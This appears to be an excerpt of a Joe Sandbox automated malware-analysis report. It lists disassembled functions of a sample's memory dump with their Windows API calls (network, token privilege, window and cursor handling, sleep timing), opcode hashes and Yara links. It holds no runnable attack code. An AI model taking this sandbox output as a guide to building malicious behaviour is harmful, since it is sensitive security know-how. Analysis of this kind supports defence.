MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F36257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F3628D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 02afe434a7e62ff901003a394cc3f54444c66915939e42e2a1ac564dfb3b5e2b
Instruction ID: acc61888c11b3459df3094e66c7e93ea37c958bb1fad739063b9bf2fa6849d59
Opcode Fuzzy Hash: 02afe434a7e62ff901003a394cc3f54444c66915939e42e2a1ac564dfb3b5e2b
Instruction Fuzzy Hash: 7631CE31A04246BFDF219F65CC48BAB7BB9BF42330F168028E864C71A1DB30D950EB90

Function 00F84EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00F84F02

Part of subcall function 00F63641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F6365B
Part of subcall function 00F63641: GetCurrentThreadId.KERNEL32 ref: 00F63662
Part of subcall function 00F63641: AttachThreadInput.USER32(00000000,?,00F65005), ref: 00F63669

GetCaretPos.USER32(?), ref: 00F84F13
ClientToScreen.USER32(00000000,?), ref: 00F84F4E
GetForegroundWindow.USER32 ref: 00F84F54

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 73e1441cc38d7a07fa7cf2510237de8308f4675f3f2cdcadb430c8dbbab7bf1c
Instruction ID: 948d4c19a3f9416d9cde42e18f4ed4f31c6a3a19e044a5fee69a067fd7b4e880
Opcode Fuzzy Hash: 73e1441cc38d7a07fa7cf2510237de8308f4675f3f2cdcadb430c8dbbab7bf1c
Instruction Fuzzy Hash: DD310E71D00108AFDB00EFA5CC859EFB7F9EF94304F50406AE555E7242EA759E059BA1

Function 00F8C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

GetCursorPos.USER32(?), ref: 00F8C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F3B9AB,?,?,?,?,?), ref: 00F8C4E7
GetCursorPos.USER32(?), ref: 00F8C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F3B9AB,?,?,?), ref: 00F8C56E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 0008eb348f186c9ae46e5ed6d1aefee93b4360b91127312136e638762ca82508
Instruction ID: c64645c398443dc26a946e9887c3d9e47a3a6f5325cbc98ed99c9abe2abb5289
Opcode Fuzzy Hash: 0008eb348f186c9ae46e5ed6d1aefee93b4360b91127312136e638762ca82508
Instruction Fuzzy Hash: DA316F35A00058AFCF25DF58CC58EFA7BB5EB09720F484169F9058B2A1C731A990FBE4

Function 00F58656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F58121
Part of subcall function 00F5810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F5812B
Part of subcall function 00F5810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F5813A
Part of subcall function 00F5810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58141
Part of subcall function 00F5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F586A3
_memcmp.LIBCMT ref: 00F586C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F586FC
HeapFree.KERNEL32(00000000), ref: 00F58703

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 3a062567d075831005c7dc02f1214042906ffb11e087b31e0f89ac4aae989ce2
Instruction ID: 221d522c09a4662c80c6f7b42b1bb2a8d1790b1e597ce372e21a8744ff0e6497
Opcode Fuzzy Hash: 3a062567d075831005c7dc02f1214042906ffb11e087b31e0f89ac4aae989ce2
Instruction Fuzzy Hash: 69219D71E01109EFDB10DFA4C989BEEB7B8EF45356F154059E944BB241DB30AE0AEB90

Function 00F2098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00F209AE

Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67896,?,?,00000000), ref: 00F05A2C
Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67896,?,?,00000000,?,?), ref: 00F05A50

_fprintf.LIBCMT ref: 00F209E5
OutputDebugStringW.KERNEL32(?), ref: 00F55DBB

Part of subcall function 00F24AAA: _flsall.LIBCMT ref: 00F24AC3

__setmode.LIBCMT ref: 00F20A1A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: fa6cf197c4b4ffc4a0a18b35a77c62ee83d54d73007553ac051e6d8288ae5d00
Instruction ID: 43e21f565776d5d846aa1c88a0c8c26ca62a2def26df2ea2c5f8e1b3cd77c519
Opcode Fuzzy Hash: fa6cf197c4b4ffc4a0a18b35a77c62ee83d54d73007553ac051e6d8288ae5d00
Instruction Fuzzy Hash: 15113A73A082146FDB04B7B4BC479FEBBA89F41320F644119F105572C3EEAC68467BA5

Function 00F71767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F717A3

Part of subcall function 00F7182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7184C
Part of subcall function 00F7182D: InternetCloseHandle.WININET(00000000), ref: 00F718E9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a48b7a60dd8b020ffc8623d09e166405b7ecb3a05db332fd707f5391b38cf7b7
Instruction ID: 61606b6f2ff70faec8d6cf1edc58d2596c7632d850b1176f6fd4c0c6f4b21b1e
Opcode Fuzzy Hash: a48b7a60dd8b020ffc8623d09e166405b7ecb3a05db332fd707f5391b38cf7b7
Instruction Fuzzy Hash: 4921D432600605BFEB169F64DC01FBABBA9FF48710F10802FF91996550D771D829B7A2

Function 00F63A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00F8FAC0), ref: 00F63A64
GetLastError.KERNEL32 ref: 00F63A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F63A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F8FAC0), ref: 00F63ADF

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 3ab06568868ff668db492f1687e7e4cc709d3305a5330a7f3742b6d204168cb8
Instruction ID: 898fcf5b8b4171154fafd1df09c90bdecebe28791a4f3ceb474f679af6d97b6d
Opcode Fuzzy Hash: 3ab06568868ff668db492f1687e7e4cc709d3305a5330a7f3742b6d204168cb8
Instruction Fuzzy Hash: C42191359082059FC700EF68C8818ABB7E4AE55364F144A2DF499C72E1D735DA4AFB42

Function 00F5DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F5DCD3,?,?,?,00F5EAC6,00000000,000000EF,00000119,?,?), ref: 00F5F0CB
Part of subcall function 00F5F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F5DCD3,?,?,?,00F5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F5F0F1
Part of subcall function 00F5F0BC: lstrcmpiW.KERNEL32(00000000,?,00F5DCD3,?,?,?,00F5EAC6,00000000,000000EF,00000119,?,?), ref: 00F5F122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F5DCEC
lstrcpyW.KERNEL32(00000000,?,?,00F5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F5DD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00F5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F5DD46

Strings

cdecl, xrefs: 00F5DD3D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 1e525205527aa4fa757286146b0169cd2a669a94ff8e6dd4cdca1ae7d8b42b75
Instruction ID: d7c8e4273d259b085e6a790314d6735f0a7998150a762b53acae54e7967acb70
Opcode Fuzzy Hash: 1e525205527aa4fa757286146b0169cd2a669a94ff8e6dd4cdca1ae7d8b42b75
Instruction Fuzzy Hash: D311B13A201305EFCB25AF34DC459BA77B8FF45320B80406AED06CB2A1EB719854E791

Function 00F350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F35101

Part of subcall function 00F2571C: __FF_MSGBANNER.LIBCMT ref: 00F25733
Part of subcall function 00F2571C: __NMSG_WRITE.LIBCMT ref: 00F2573A
Part of subcall function 00F2571C: RtlAllocateHeap.NTDLL(018B0000,00000000,00000001,00000000,?,?,?,00F20DD3,?), ref: 00F2575F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: b1837166bbea550c9ed9b9d5af263201ea85007aeada8d006229186e87af4744
Instruction ID: bfcf6d69eac507fffd81101bde98f392df899d39b5400935bbfc34cd3c7d5f4e
Opcode Fuzzy Hash: b1837166bbea550c9ed9b9d5af263201ea85007aeada8d006229186e87af4744
Instruction Fuzzy Hash: 5811C2B2905A29AECF313F74BC45BAE37989F94BB1F104929F9049A161DE388941B790

Function 00F76369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67896,?,?,00000000), ref: 00F05A2C
Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67896,?,?,00000000,?,?), ref: 00F05A50

gethostbyname.WSOCK32(?,?,?), ref: 00F76399
WSAGetLastError.WSOCK32(00000000), ref: 00F763A4
_memmove.LIBCMT ref: 00F763D1
inet_ntoa.WSOCK32(?), ref: 00F763DC

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e0ff0559bb823d57db220e10082523d276955bce1eca982f31bc277403651154
Instruction ID: 64f81b0f3ec33fa278338836f51f07ab80b71fb25c6546cbe0c6b8f0a28c0003
Opcode Fuzzy Hash: e0ff0559bb823d57db220e10082523d276955bce1eca982f31bc277403651154
Instruction Fuzzy Hash: 25112172900109AFCF04FBA4DD46DEE77B8AF04310B548065F505E72A2DB789E18FB61

Function 00F58B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00F58B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F58B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F58B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F58BA4

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 80b6bf90bd87686d06c5a3c9d0e0fa139bd3d8eebca30af5dd6a2d115ec0b41b
Instruction ID: 9d65ceeccd3997c66d1d75cd19f78ec41c71a89f78237bc28a5f56be488b513e
Opcode Fuzzy Hash: 80b6bf90bd87686d06c5a3c9d0e0fa139bd3d8eebca30af5dd6a2d115ec0b41b
Instruction Fuzzy Hash: B7114C79900218FFDB10DF95CC84FADBB78FB48750F204195EA00B7250DA716E15EB94

Function 00F01290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

DefDlgProcW.USER32(?,00000020,?), ref: 00F012D8
GetClientRect.USER32(?,?), ref: 00F3B5FB
GetCursorPos.USER32(?), ref: 00F3B605
ScreenToClient.USER32(?,?), ref: 00F3B610

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: db97f6f5c481a993234d3fffe91ba83573ee7b2bdc8a6a0bc6e94339cb9fa4f0
Instruction ID: b0d44093550cd9511b15961c78820b3e6224416b186a107303448c95bb5c62c8
Opcode Fuzzy Hash: db97f6f5c481a993234d3fffe91ba83573ee7b2bdc8a6a0bc6e94339cb9fa4f0
Instruction Fuzzy Hash: 83110236A00019EFCB00EFA8D8899FE77B8FB05301F400456FA01E7281D734AA95BBA5

Function 00F61142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F5FCED,?,00F60D40,?,00008000), ref: 00F6115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F5FCED,?,00F60D40,?,00008000), ref: 00F61184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F5FCED,?,00F60D40,?,00008000), ref: 00F6118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00F5FCED,?,00F60D40,?,00008000), ref: 00F611C1

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d22f3693d38778d4bdf884578f34144255688aed0fc929af2154729e1c230a93
Instruction ID: 6870fc0ef96040d467584b4a7d0099ea5a60eda0adf1835ba1f5713e88eec27d
Opcode Fuzzy Hash: d22f3693d38778d4bdf884578f34144255688aed0fc929af2154729e1c230a93
Instruction Fuzzy Hash: 19117C32C0092DDBCF009FA4D888AEEBB7CFF0A711F144056EA40B2240CB749554EBA1

Function 00F5D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F5D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F5D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F5D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F5D897

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 63f3849552017e0fdc55c0ed186034fe8cbf4139cfa942aba1b5c05cba0a236a
Instruction ID: 14c148bd63ffcd897a81a3a6ebda3ffc1c8477eb0576fe2436c308a0bd50ab3d
Opcode Fuzzy Hash: 63f3849552017e0fdc55c0ed186034fe8cbf4139cfa942aba1b5c05cba0a236a
Instruction Fuzzy Hash: 97116175606304DFE730CF50EC09FA3BBBCEB00B12F10856AAA16D6090D7B0E54DABA1

Function 00F36FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00F36FDB

Part of subcall function 00F376C2: __fltout2.LIBCMT ref: 00F376EB

__cftog_l.LIBCMT ref: 00F37001
__cftoe_l.LIBCMT ref: 00F37033

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
